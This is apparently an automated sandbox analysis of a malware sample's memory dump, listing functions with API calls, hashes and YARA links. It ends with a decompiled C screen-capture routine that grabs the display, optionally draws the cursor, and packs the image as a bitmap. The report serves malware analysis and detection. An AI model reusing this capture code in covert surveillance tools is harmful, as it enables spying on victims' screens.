                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A593, Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D41
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D4E
                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0044A5E7
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$_free$InfoLocale_abort
                                          • String ID:
                                          • API String ID: 1663032902-0
                                          • Opcode ID: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
                                          • Instruction ID: d815766c36d9954a4c820c073ba9809893cec4c66f47e331b0827f9a13c2a0fe
                                          • Opcode Fuzzy Hash: 1d23a962e4247796f6940d6c6d10ae8ecf88f37509316fbaa38232d644d664f4
                                          • Instruction Fuzzy Hash: 1F21D03258020AABFB249E25DC86BBB73A8EB04314F14407BF905C6241EB3CED55CB5E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A21B, Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • EnumSystemLocalesW.KERNEL32(0044A343,00000001,00000000,?,0043E2C1,?,0044A970,00000000,?,?,?), ref: 0044A28D
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                                          • Instruction ID: fef6e57728511f2b9b1dd238f7a777dd7648a2b970c096311ec5bc0c4a713da2
                                          • Opcode Fuzzy Hash: 3f4933a1a1ee220f0dbad5b64f72dc4827fcab8f9caec66703019ab1352aed1c
                                          • Instruction Fuzzy Hash: 3F114C372007055FEB189F39C8916BBB791FF80359B14442DE98647740E7B6B952DB44
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A7C3, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0044A561,00000000,00000000,?), ref: 0044A7EF
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$InfoLocale_abort_free
                                          • String ID:
                                          • API String ID: 2692324296-0
                                          • Opcode ID: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
                                          • Instruction ID: 83d8b15de60c056d1b119042d664eee472c135ad5aa1af093dd0495062aa18b7
                                          • Opcode Fuzzy Hash: 1cd820401b6a1c1bbe6edf503f73b5c6d44779daf189f74fcf19ed8e0c0a0003
                                          • Instruction Fuzzy Hash: 3AF04932990116ABFB246B25CC057BBBB68EB00318F14442AEC05A3240EA38FE62C6D5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A2B6, Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • EnumSystemLocalesW.KERNEL32(0044A593,00000001,?,?,0043E2C1,?,0044A934,0043E2C1,?,?,?,?,?,0043E2C1,?,?), ref: 0044A302
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                                          • Instruction ID: b467c6c7c7f8ac7ca1ad2f3a7ac430e87e8f1bd3a8912e360415dfb464baff1b
                                          • Opcode Fuzzy Hash: e6193cd3b2cb708b7780c009108bef3b0113aba1580a16d571c1eda4c60849ca
                                          • Instruction Fuzzy Hash: 28F022323403045FEB149F399C81A6A7B95FF80368B14443EF9418B690E6B6DC419A04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0044A1D0, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00441CE2: GetLastError.KERNEL32(?,00000000,0043B8C2,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441CE6
                                            • Part of subcall function 00441CE2: _free.LIBCMT ref: 00441D19
                                            • Part of subcall function 00441CE2: SetLastError.KERNEL32(00000000,?,004170CE,-0046DD44,?,?,?,?,?,0040AEF2,.vbs), ref: 00441D5A
                                            • Part of subcall function 00441CE2: _abort.LIBCMT ref: 00441D60
                                          • EnumSystemLocalesW.KERNEL32(0044A127,00000001,?,?,?,0044A992,0043E2C1,?,?,?,?,?,0043E2C1,?,?,?), ref: 0044A207
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                          • String ID:
                                          • API String ID: 1084509184-0
                                          • Opcode ID: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                                          • Instruction ID: a7fadff6d2ca21f630832dc779862bf22c9b6182ed5b4a5894b7910ac126a48e
                                          • Opcode Fuzzy Hash: fa2dd48da86d2843f62e137803b5bb2482421d1c388bbb34657bff8fd84012d4
                                          • Instruction Fuzzy Hash: 1FF0553A38030557EB049F75DC49B6BBFA0FFC1719F06405AEA058B690C67AD942CB54
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040D1E5, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetLocaleInfoA.KERNEL32(00000800,0000005A,00000000,00000003,?,?,?,00411E51,0046C238,0046C5B4,0046C238,00000000,0046C238,00000000,0046C238,3.2.1 Pro), ref: 0040D1F9
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID: InfoLocale
                                          • String ID:
                                          • API String ID: 2299586839-0
                                          • Opcode ID: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                                          • Instruction ID: ac7816e6a697d777cf06a73d6884089d523ece1dfcb51b9ad9a20d9ec724333c
                                          • Opcode Fuzzy Hash: 4c1a934f5ac5a3c0cab132a0d4aa1abdd1fcf80b677e654e19d5e57048290400
                                          • Instruction Fuzzy Hash: 47D05E7074021DBBEA14D6959C0AEAB7B9CD701B66F0001A6BE04D72C0E9E1AE04C7E1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043820B, Relevance: 1.5, Strings: 1, Instructions: 214COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID: 0
                                          • API String ID: 0-4108050209
                                          • Opcode ID: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                          • Instruction ID: 656339de93b15354355cc6fc116552e81dda14c8a7802dd6a12fd3361ec49b7a
                                          • Opcode Fuzzy Hash: 84d520a0f70926c0a60d58c698a882ed3c5d158336cfdaa718a2f8f638245402
                                          • Instruction Fuzzy Hash: AC515170204B495BEF38456844457BFE3989B6E744F18298FFC82D7382CE5EED06825E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004516E0, Relevance: .7, Instructions: 651COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
                                          • Instruction ID: 2cb720bef2544e5c06a33a5d17755d7e86d39b9e029a2e5d8d400cd4f85def03
                                          • Opcode Fuzzy Hash: 5a62310b6c4938199bce2ab53516f4e3097276e77197fa2db35135d46eaa054e
                                          • Instruction Fuzzy Hash: C832F122D29F014DD723A634C832336A249AFB33C6F55C737EC1AB5AB6EB2984C74145
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004228B7, Relevance: .4, Instructions: 411COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                                          • Instruction ID: 2ff722b402dd1cb968047811478b8eaada24175be06acbaae8cb73f1bee3a1e2
                                          • Opcode Fuzzy Hash: a36650f4476d2c1beb279d6cd08f3ea78fa53924551c37a7b84cf426fdaf80e9
                                          • Instruction Fuzzy Hash: 3E02C1716005519FD318CF2EEC9153AB7E1EF8E301748853AE486C7395EB74EA22DB94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043450A, Relevance: .3, Instructions: 345COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction ID: 2e3b19bf7ee36a531d95d42fa299a25bd2e154ed583d8d0915d7b163c9cd7bd2
                                          • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                          • Instruction Fuzzy Hash: C8C1B63220509349DF2D463984340BFBAA19ED67B5B1A276FD4B3CF2D4EF28E924D524
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043493F, Relevance: .3, Instructions: 341COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction ID: 478658756e30f7f1ba970a92bd0e41a0f1cb0e3296731c86c1f7c4ea0a9e4636
                                          • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                          • Instruction Fuzzy Hash: F6C1B43220609349DF2D4639C4741BFBAA19ED67B1B1A275ED4B2CF2C4EF18E924D624
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004340D5, Relevance: .3, Instructions: 331COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction ID: 89fb698572b7cf86533d0eea82b05fcf403d339a8e9ac14319646ffa1aaa429a
                                          • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                                          • Instruction Fuzzy Hash: 67C1D8322060534ADF2D463984341BFBAA09EE57B1B1A276FD4B3CF2C4EF18E964D524
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00419521, Relevance: .3, Instructions: 277COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
                                          • Instruction ID: b026397cdc5a2788a8846e4ec5f60ec3cbb44c94b97407c66bc8dff9a88f8d49
                                          • Opcode Fuzzy Hash: 87fbe7bf7bf54041e8de41a6fd51e618a094b94f8abcd9874f2157c003b73034
                                          • Instruction Fuzzy Hash: F6B18179524A929AC701AF29C0A13F17BA1FF6A304F1850B9DC98CFB57E3295412EB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0043843A, Relevance: .2, Instructions: 237COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                                          • Instruction ID: b367387755e38c2acd2464c16e73056793f51d4de4b8bca9bcadcc32440fe761
                                          • Opcode Fuzzy Hash: 21b115038f7e4976344a74245cac352abb538fa6c5ac7dc22365ff8df30af6da
                                          • Instruction Fuzzy Hash: 84615B7120070A77DE389A2888927BFE3949B6D304F14391FF942DB781EE1DDD42825E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00423098, Relevance: .2, Instructions: 195COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                                          • Instruction ID: 6a2ad8edffecebfcaae903e9719156c7a0c76254d9b187d9e67c469d6c3393be
                                          • Opcode Fuzzy Hash: fce7a91475ddc2f1612e9a8a03468a5b99e4f47943d3026f662be594c0441147
                                          • Instruction Fuzzy Hash: CB613C31E0021AABDF08DFB9D5815EFB7B2FF8C304F50812AE425BB250DA746A058B94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F15D, Relevance: .1, Instructions: 90COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                                          • Instruction ID: 7a46c63e6297807c5de7f1130092129a1d39734970edeb025e6968c5830d1d5b
                                          • Opcode Fuzzy Hash: c845c6cc5c459e0427f3b6d9b164718d9ff2b4bcf1554f86a141997a7a1484ed
                                          • Instruction Fuzzy Hash: 8F315A75A00115AFCB20CF59CD81B5AB7A9FF48354F1580B6ED04AB382D375EA64CB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00431670, Relevance: .1, Instructions: 76COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000007.00000002.826103091.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000007.00000002.826635297.000000000046F000.00000040.00000001.sdmp Download File
                                          Yara matches
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction ID: f68e5f41fa18727e6a735129a3979a796d7c5d5db83d10118ba36f39fff963d2
                                          • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                          • Instruction Fuzzy Hash: F2113D7724018143D61486BEC9B95B7A3D5EBCE321F2D637BD0424B778D32AD945950C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00414906, Relevance: 49.3, APIs: 27, Strings: 1, Instructions: 298windowmemoryCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 81%
                                          			E00414906(void* __ecx, char __edx, void* __eflags, signed int _a4) {
				void* _v12;
				char _v13;
				struct HDC__* _v20;
				signed int _v24;
				signed int _v28;
				int _v32;
				int _v36;
				struct HDC__* _v40;
				void* _v46;
				intOrPtr _v50;
				intOrPtr _v54;
				char _v56;
				char _v80;
				intOrPtr _v84;
				struct tagCURSORINFO _v100;
				signed int _v106;
				signed int _v108;
				long _v116;
				long _v120;
				char _v124;
				struct _ICONINFO _v144;
				char _v168;
				void* __ebx;
				int _t114;
				void* _t115;
				void* _t116;
				void* _t120;
				int _t127;
				void* _t128;
				signed char _t140;
				long _t146;
				void* _t147;
				int _t149;
				void* _t157;
				void* _t186;
				void* _t188;
				void* _t194;
				int _t199;
				void* _t204;
				void* _t223;
				signed int _t226;
				struct HDC__* _t228;
				struct HDC__* _t232;
				struct tagBITMAPINFO* _t234;
				void* _t235;
				int _t241;

				_v13 = __edx;
				_t194 = __ecx;
				_t232 = CreateDCA("DISPLAY", 0, 0, 0);
				_v20 = _t232;
				_t228 = CreateCompatibleDC(_t232);
				_v40 = _t228;
				_v32 = L00414D3D( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t114 = L00414D89( *((intOrPtr*)(0x46bd78 + _a4 * 4)));
				_t199 = _v32;
				_v36 = _t114;
				if(_t199 != 0 || _t114 != 0) {
					_t115 = CreateCompatibleBitmap(_t232, _t199, _t114);
					_v12 = _t115;
					__eflags = _t115;
					if(_t115 != 0) {
						_t116 = SelectObject(_t228, _t115);
						__eflags = _t116;
						if(_t116 != 0) {
							_v28 = _v28 & 0x00000000;
							_v24 = _v24 & 0x00000000;
							L00414DCA( *((intOrPtr*)(0x46bd78 + _a4 * 4)),  &_v28);
							_t120 = StretchBlt(_t228, 0, 0, _v32, _v36, _t232, _v28, _v24, _v32, _v36, 0xcc0020);
							__eflags = _t120;
							if(_t120 == 0) {
								goto L7;
							}
							__eflags = _v13;
							if(_v13 != 0) {
								_v100.cbSize = 0x14;
								_t186 = GetCursorInfo( &_v100);
								__eflags = _t186;
								if(_t186 != 0) {
									_t188 = GetIconInfo(_v100.hCursor,  &_v144);
									__eflags = _t188;
									if(_t188 != 0) {
										_t241 = _v84 - _v144.yHotspot - _v24;
										__eflags = _t241;
										DeleteObject(_v144.hbmColor);
										DeleteObject(_v144.hbmMask);
										_t228 = _v40;
										DrawIcon(_t228, _v100.ptScreenPos - _v144.xHotspot - _v28, _t241, _v100.hCursor);
										_t232 = _v20;
									}
								}
							}
							_push( &_v124);
							_t127 = 0x18;
							_t128 = GetObjectA(_v12, _t127, ??);
							__eflags = _t128;
							if(_t128 == 0) {
								goto L7;
							} else {
								_t226 = _v106 * _v108 & 0x0000ffff;
								__eflags = _t226 - 1;
								if(_t226 != 1) {
									_push(4);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										L24:
										__eflags = 1 << 1;
										_push(0x2eb6edc);
										L25:
										_t234 = LocalAlloc(0x40, ??);
										_t204 = 0x18;
										_t234->bmiHeader = 0x28;
										_t234->bmiHeader.biWidth = _v120;
										_t234->bmiHeader.biHeight = _v116;
										_t234->bmiHeader.biPlanes = _v108;
										_t234->bmiHeader.biBitCount = _v106;
										_t140 = _a4;
										__eflags = _t140 - _t204;
										if(_t140 < _t204) {
											__eflags = 1;
											_t234->bmiHeader.biClrUsed = 1 << _t140;
										}
										_t234->bmiHeader.biCompression = _t234->bmiHeader.biCompression & 0x00000000;
										_t234->bmiHeader.biClrImportant = _t234->bmiHeader.biClrImportant & 0x00000000;
										asm("cdq");
										_t227 = _t226 & 0x00000007;
										_t146 = (_t234->bmiHeader.biWidth + 7 + (_t226 & 0x00000007) >> 3) * (_a4 & 0x0000ffff) * _t234->bmiHeader.biHeight;
										_t234->bmiHeader.biSizeImage = _t146;
										_t147 = GlobalAlloc(0, _t146);
										_a4 = _t147;
										__eflags = _t147;
										if(_t147 != 0) {
											_t149 = GetDIBits(_t228, _v12, 0, _t234->bmiHeader.biHeight & 0x0000ffff, _t147, _t234, 0);
											__eflags = _t149;
											if(_t149 != 0) {
												_v56 = 0x4d42;
												_v54 = _t234->bmiHeader + _t234->bmiHeader.biSizeImage + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												_v50 = 0;
												_t157 = _t234->bmiHeader + _t234->bmiHeader.biClrUsed * 4 + 0xe;
												__eflags = _t157;
												_v46 = _t157;
												E004020D5(_t194,  &_v80);
												E004020D5(_t194,  &_v168);
												E0040251D(_t194,  &_v80, _t227, __eflags,  &_v56, 0xe);
												E00403436( &_v80);
												E0040251D(_t194,  &_v80, _t227, __eflags, _t234, 0x28);
												E00403436( &_v80);
												_t235 = _a4;
												E0040251D(_t194,  &_v80, _t227, __eflags, _t235, _t234->bmiHeader.biSizeImage);
												E00403436( &_v80);
												DeleteObject(_v12);
												GlobalFree(_t235);
												DeleteDC(_v20);
												DeleteDC(_t228);
												E00402044(_t194, _t194, __eflags,  &_v168);
												E00401FC7();
												E00401FC7();
												goto L32;
											}
											DeleteDC(_v20);
											DeleteDC(_t228);
											DeleteObject(_v12);
											GlobalFree(_a4);
											goto L2;
										} else {
											_push(_v20);
											L8:
											DeleteDC();
											DeleteDC(_t228);
											_push(_v12);
											goto L5;
										}
									}
									_push(8);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_push(0x10);
									_pop(1);
									_a4 = 1;
									__eflags = _t226 - 1;
									if(_t226 <= 1) {
										goto L24;
									}
									_t223 = 0x18;
									__eflags = _t226 - _t223;
									if(_t226 > _t223) {
										_push(0x20);
										_pop(1);
										L23:
										_a4 = 1;
										goto L24;
									}
									_a4 = _t223;
									_push(0x28);
									goto L25;
								}
								goto L23;
							}
						}
						L7:
						_push(_t232);
						goto L8;
					} else {
						DeleteDC(_t232);
						DeleteDC(_t228);
						_push(0);
						L5:
						DeleteObject();
						goto L2;
					}
				} else {
					L2:
					E00402084(_t194, _t194, 0x45f6bc);
					L32:
					return _t194;
				}
			}

















































                                          0x00414914
                                          0x0041491f
                                          0x00414927
                                          0x0041492a
                                          0x00414936
                                          0x00414938
                                          0x00414947
                                          0x00414954
                                          0x00414959
                                          0x0041495c
                                          0x00414961
                                          0x0041497b
                                          0x00414981
                                          0x00414984
                                          0x00414986
                                          0x004149a0
                                          0x004149a6
                                          0x004149a8
                                          0x004149c1
                                          0x004149c5
                                          0x004149d0
                                          0x004149f0
                                          0x004149f6
                                          0x004149f8
                                          0x00000000
                                          0x00000000
                                          0x004149fa
                                          0x004149fe
                                          0x00414a03
                                          0x00414a0b
                                          0x00414a11
                                          0x00414a13
                                          0x00414a1f
                                          0x00414a25
                                          0x00414a27
                                          0x00414a41
                                          0x00414a41
                                          0x00414a44
                                          0x00414a4d
                                          0x00414a58
                                          0x00414a5c
                                          0x00414a62
                                          0x00414a62
                                          0x00414a27
                                          0x00414a13
                                          0x00414a68
                                          0x00414a6b
                                          0x00414a70
                                          0x00414a76
                                          0x00414a78
                                          0x00000000
                                          0x00414a7e
                                          0x00414a85
                                          0x00414a8b
                                          0x00414a8e
                                          0x00414a94
                                          0x00414a96
                                          0x00414a97
                                          0x00414a9a
                                          0x00414a9d
                                          0x00414aca
                                          0x00414aca
                                          0x00414ad3
                                          0x00414ad4
                                          0x00414adc
                                          0x00414ae0
                                          0x00414ae1
                                          0x00414aea
                                          0x00414af0
                                          0x00414af7
                                          0x00414aff
                                          0x00414b03
                                          0x00414b06
                                          0x00414b09
                                          0x00414b10
                                          0x00414b12
                                          0x00414b12
                                          0x00414b1e
                                          0x00414b22
                                          0x00414b26
                                          0x00414b27
                                          0x00414b35
                                          0x00414b3c
                                          0x00414b3f
                                          0x00414b45
                                          0x00414b48
                                          0x00414b4a
                                          0x00414b63
                                          0x00414b69
                                          0x00414b6b
                                          0x00414b98
                                          0x00414bac
                                          0x00414bb1
                                          0x00414bbc
                                          0x00414bbc
                                          0x00414bc2
                                          0x00414bc5
                                          0x00414bd0
                                          0x00414bde
                                          0x00414bed
                                          0x00414bf8
                                          0x00414c07
                                          0x00414c0f
                                          0x00414c16
                                          0x00414c25
                                          0x00414c2d
                                          0x00414c34
                                          0x00414c43
                                          0x00414c46
                                          0x00414c51
                                          0x00414c5c
                                          0x00414c64
                                          0x00000000
                                          0x00414c64
                                          0x00414b76
                                          0x00414b79
                                          0x00414b7e
                                          0x00414b88
                                          0x00000000
                                          0x00414b4c
                                          0x00414b4c
                                          0x004149ab
                                          0x004149b1
                                          0x004149b4
                                          0x004149b6
                                          0x00000000
                                          0x004149b6
                                          0x00414b4a
                                          0x00414a9f
                                          0x00414aa1
                                          0x00414aa2
                                          0x00414aa5
                                          0x00414aa8
                                          0x00000000
                                          0x00000000
                                          0x00414aaa
                                          0x00414aac
                                          0x00414aad
                                          0x00414ab0
                                          0x00414ab3
                                          0x00000000
                                          0x00000000
                                          0x00414ab7
                                          0x00414ab8
                                          0x00414abb
                                          0x00414ac4
                                          0x00414ac6
                                          0x00414ac7
                                          0x00414ac7
                                          0x00000000
                                          0x00414ac7
                                          0x00414abd
                                          0x00414ac0
                                          0x00000000
                                          0x00414ac0
                                          0x00000000
                                          0x00414a90
                                          0x00414a78
                                          0x004149aa
                                          0x004149aa
                                          0x00000000
                                          0x00414988
                                          0x0041498f
                                          0x00414992
                                          0x00414994
                                          0x00414996
                                          0x00414996
                                          0x00000000
                                          0x00414996
                                          0x00414967
                                          0x00414967
                                          0x0041496e
                                          0x00414c6b
                                          0x00414c71
                                          0x00414c71

                                          APIs
                                          • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00414921
